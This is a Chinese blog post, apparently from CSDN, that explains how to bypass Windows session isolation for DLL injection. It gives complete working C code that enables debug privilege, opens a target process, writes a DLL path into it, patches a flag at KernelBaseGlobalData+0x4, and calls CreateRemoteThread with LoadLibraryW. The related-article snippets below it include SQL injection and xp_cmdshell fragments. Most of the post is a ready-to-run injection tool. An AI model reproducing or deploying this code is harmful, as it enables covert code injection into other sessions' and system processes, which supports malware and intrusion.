跨session注入dll

最新推荐文章于 2024-07-07 13:30:11 发布
最新推荐文章于 2024-07-07 13:30:11 发布
阅读量696 收藏 2
点赞数
分类专栏: 爱好
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37353105/article/details/102667830
版权

有一件有意思的事 SESSION 隔离是在 RING 3 实现的,而非在 RING 0 里实现,意思是用户层可以修改session的标志位,CreateRemoteThreadEx中会判断当前的会话级别,这里只需要在应用层修改自己的KernelBaseGlobalData+0x4的位置的数据为1就能完成跨session注入,但是有的进程你还是注入不了,这个也只能解决在不同session下dll注入的问题,下图是注入成功的图

代码如下所示

#include<windows.h>
#include<stdio.h>

typedef void* (__fastcall *LPFN_KernelBaseGetGlobalData)(void);


BOOL WINAPI InjectDllExW(DWORD dwPID, PCWSTR pwszProxyFile)
{
	BOOL ret = FALSE;
	HANDLE hToken = NULL;
	HANDLE hProcess = NULL;
	HANDLE hThread = NULL;
	FARPROC pfnThreadRtn = NULL;
	PWSTR pwszPara = NULL;
	PVOID pRemoteShellcode = NULL;

	hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID);
	if (!hProcess) {
		//printf("Open Process failed\n");
		return FALSE;
	}

	//得到函数地址,三环下对应的位置api地址都是相同的
	pfnThreadRtn = GetProcAddress(GetModuleHandle(TEXT("Kernel32.dll")), "LoadLibraryW");

	//写入字符串到被注入的进程
	size_t iProxyFileLen = wcslen(pwszProxyFile) * sizeof(WCHAR);
	pwszPara = (PWSTR)VirtualAllocEx(hProcess, NULL, iProxyFileLen, MEM_COMMIT,PAGE_READWRITE);

	if (!pwszPara) {
		//printf("VirtualAllocEx failed\n");
		return FALSE;
	}

	WriteProcessMemory(hProcess, pwszPara, (PVOID)pwszProxyFile, iProxyFileLen, NULL);

	//找修改的位置
	LPFN_KernelBaseGetGlobalData pKernelBaseGetGlobalData = NULL;
	UCHAR* pGlobalData = NULL;
	UCHAR* pMisc = NULL;
	ULONG PatchOffset = 0;

	pKernelBaseGetGlobalData =(LPFN_KernelBaseGetGlobalData)GetProcAddress(LoadLibraryW(L"KernelBase.dll"), "KernelBaseGetGlobalData");
	pGlobalData = (UCHAR*)pKernelBaseGetGlobalData();


	PatchOffset = 0x4;

	printf("PatchOffset: %x\n", pwszPara);

	pMisc = pGlobalData + PatchOffset;
	*pMisc = 1;


	//创建远程线程
	hThread = CreateRemoteThread(hProcess, NULL, 0,(LPTHREAD_START_ROUTINE)pfnThreadRtn, pwszPara, 0, NULL);

	//等待结束
	WaitForSingleObject(hThread, INFINITE);
	CloseHandle(hThread);
	VirtualFreeEx(hProcess, pwszPara, 0, MEM_RELEASE);
	CloseHandle(hProcess);
	return TRUE;
}

BOOL EnableDebugPrivilege()
{
	HANDLE hToken;
	LUID sedebugnameValue;
	TOKEN_PRIVILEGES tkp;
	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
		return   FALSE;
	}
	if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue)) {
		CloseHandle(hToken);
		return FALSE;
	}
	tkp.PrivilegeCount = 1;
	tkp.Privileges[0].Luid = sedebugnameValue;
	tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
	if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL)) {
		CloseHandle(hToken);
		return FALSE;
	}
	return TRUE;
}

int main() {


	EnableDebugPrivilege();
	InjectDllExW(3288,L"C:\\Users\\Administrator\\Desktop\\InJecteDll.dll");


	//LoadLibraryW(L"InJecteDll.dll");
	system("pause");
	return 0;
}

 

被遗弃的庸才
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
关于dll注入方式的学习(突破session 0的远程线程注入
2201_75856701的博客
03-02 339
举个RING权限的最简单的例子:一个停止响应的应用程式,它运行在比RING0更低的指令环上,你不必大费周章的想着如何使系统回复运作,这期间,只需要启动任务管理器便能轻松终止它,因为它运行在比程式更低的RING0指令环中,拥有更高的权限,可以直接影响到RING0以上运行的程序,当然有利就有弊,RING保证了系统稳定运行的同时,也产生了一些十分麻烦的问题。比如一些OS虚拟化技术,在处理RING指令环时便遇到了麻烦,系统是运行在RING0指令环上的,但是虚拟的OS毕竟也是一个系统,也需要与系统相匹配的权限。
session注入
weixin_30799995的博客
08-15 527
codz: <%dim rsset rs=Server.Createobject("Adodb.recordset")sql="select * from kevinadmin"rs.open sql,connoldpass=rs("k_pass")rs.closesql="update kevinadmin set k_pass='" & request.Form("...
免杀笔记 ---> Session0--DLL注入
最新发布
huohaowen的博客
07-07 963
刚更新完上一篇,于是我们就马不停蹄的去跟新下一篇!!Session0注入这次,我把这个脚本直接传到Github上了 喜欢的师傅点个Star噢 (❤ ω ❤)whoami-juruo/DLLInjectTools: 一款集成了窃取令牌和从Session0和3进行DLL注入的工具。
第四章 突破SESSION 0隔离 远程线程注入(附源码)
test\\的博客
12-01 690
目录前言函数介绍ZwCreateThreadEx函数语法示例程序代码DLL代码测试原理学习 前言 在上一章《远程线程注入》中,我们可以向普通用户进程注入DLL;但是无法向system等权限的系统服务器进程中注入。 由于系统的SESSION 0隔离机制,导致注入失败;我们可使用ZwCreateThreadEx函数进行远程线程注入,可以突破SESSION 0隔离。 函数介绍 大部分函数在上一章中已具体分析过,本章节将忽略 ZwCreateThreadEx函数 突破SESSION 0隔离,将DLL注入到系统服务进
突破SESSION0隔离的远程线程注入.zip
08-06
C++ 突破SESSION0隔离的远线程注入,可用于注入Winloogon.exe ,XP、win7、win10亲测都可以使用,注入器需要管理员身份运行。本人主要用于注入winlogon,winsta0\winlogon截屏使用
新型注入方式直击网络——session注入探究
|独自望海。。。
09-29 1079
首先说明,本文不是讲session欺骗方法或原理。    1年前流转跟我说他有一个想法,就是session注入,当时我认为有点不可能,因为session很少进库的,就算进库了,也注射不了,就算能注射,也不能回显,对access没什么用处。后来看“寂寞的刺猬”大哥写的一篇漏洞分析文章的时候无意中发现他截取的代码里
驱动层注入dll demo,源码未传
10-27
行为监控最好的方式是远程注入dll,应用层设置的全局钩子,对非消息模式的进程无效;或者其他方法,有权限不同、session不同、注入滞后等弱点。本demo是在驱动层,进程创建完毕还未执行主线程时,即注入dll,对系统...
服务Dll注入Svchost进程
08-31
1、实现服务dll 2、注入到svchost进程 3、服务打开计算器(涉及到session,知识点) 4、线程输出时间debugview中查看 程序安装完服务,服务启动有以下方式: 1、重启电脑,使用电脑自带svhost服务组自启动服务; 2、...
精选_突破SESSION0隔离的的远线程注入DLL技术剖析_源码打包
03-10
突破SESSION0隔离的的远线程注入DLL技术剖析
手工注入常用SQL语句笔记.docx
04-10
* exec sp_addextendedproc xp_cmdshell,'xplog70.dll' 恢复扩展存储过程 * exec sp_dropextendedproc 'xp_cmdshell' 0x00 删除扩展存储过程 七、MySQL 一般注入 * (select) 1.注释符 #/*-- * 2.过滤空格注入使用/...
如果把一个session scope的bean注入给service(把登陆后session范围的user注入到服务层)...
fxfeiyi
10-12 318
老系统移植到基于spring, struts, hibernate架构,由于原有权限都是做到service层,即在调用某个业务方法的前面硬编码判断是否有权限。权限做到service里是否合理暂且不考虑。 原来action调用service的方法时都要给service方法多传递一个UserInfo 参数,现在想使用spring给service注入保存在session中的UserInfo, 不知...
[原创]新型注入方式直击网络——session注入探究 邪恶八进制信息安全团队官方讨论组 努力为祖国的信息安全撑起一片蓝天 - EvilOctal Security Team - E_S_T.mht
08-22
[原创]新型注入方式直击网络——session注入探究 邪恶八进制信息安全团队官方讨论组 努力为祖国的信息安全撑起一片蓝天 - EvilOctal Security Team - E_S_T.mht
SESSION变量覆盖导致SQL注入漏洞
qq_31763129的博客
05-09 1423
include/common.inc.php文件,搜索(大概在68行的样子)   if( strlen($svar)&gt;0 &amp;&amp; preg_match('#^(cfg_|GLOBALS|_GET|_POST|_COOKIE)#',$svar) )      修改为      if( strlen($svar)&gt;0 &amp;&amp; preg_match('#^(cfg...
HttpSession
Coooooc的博客
03-29 245
HttpSession 服务端技术HttpSession原理当用户端第一次访问Servlet时 服务端会给该用户创建 一个独立Session 并且生成一个SessionID 这个SessionID在响应浏览器的时候 会被装进cookie中 从而被保存到浏览器中 当用户再一次访问 Servlet的时候 请求中会携带着 cookie中的 SessionID 去访问 服务器会根据这个Sessi
突破session 0隔离 和 劫持exe注入(转自梦无极)
weixin_30378311的博客
07-31 220
代码基本源于网络,作用看个人需求。session 0隔离是个老话题,这里简单讲讲,小伙伴们赶快看过来吧。自vista系统开始,进程便有了session空间的概念,一般系统服务进程是在session 0的会话空间里面执行,其他应用程序都是在session 1或者session x会话空间中运行。一般情况下,进程A属于session x会话空间,那么它所创建的进程同样是属于session x会话空间。...
Windows session0 问题
不定期更新的博客
09-15 736
Windows session0 问题
C++ windows 服务Session0穿透
远方
08-01 2556
做个服务拉起应用进程的需求,发现进程后台起了,但是没有界面 先看这两篇: 穿透Session 0 隔离(一) 穿透Session 0 隔离(二) 说的很清楚,这里不做解释 我们这里用C++代码实现 HANDLE GetProcessHandle(int ID) { return OpenProcess(PROCESS_ALL_ACCESS, FALSE, ID); } BOOL ...
Web安全总结分析:XSS站、SQL注入、文件操作等威胁
本文将从多个角度对WEB安全进行总结分析,包括XSS站、SQL注入、文件操作、访问控制、伪造请求、Session管理、Web标准化、错误处理、逻辑问题、第三方软件安全等多个方面。 **XSS站脚本(XSS)** XSS站脚本是...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值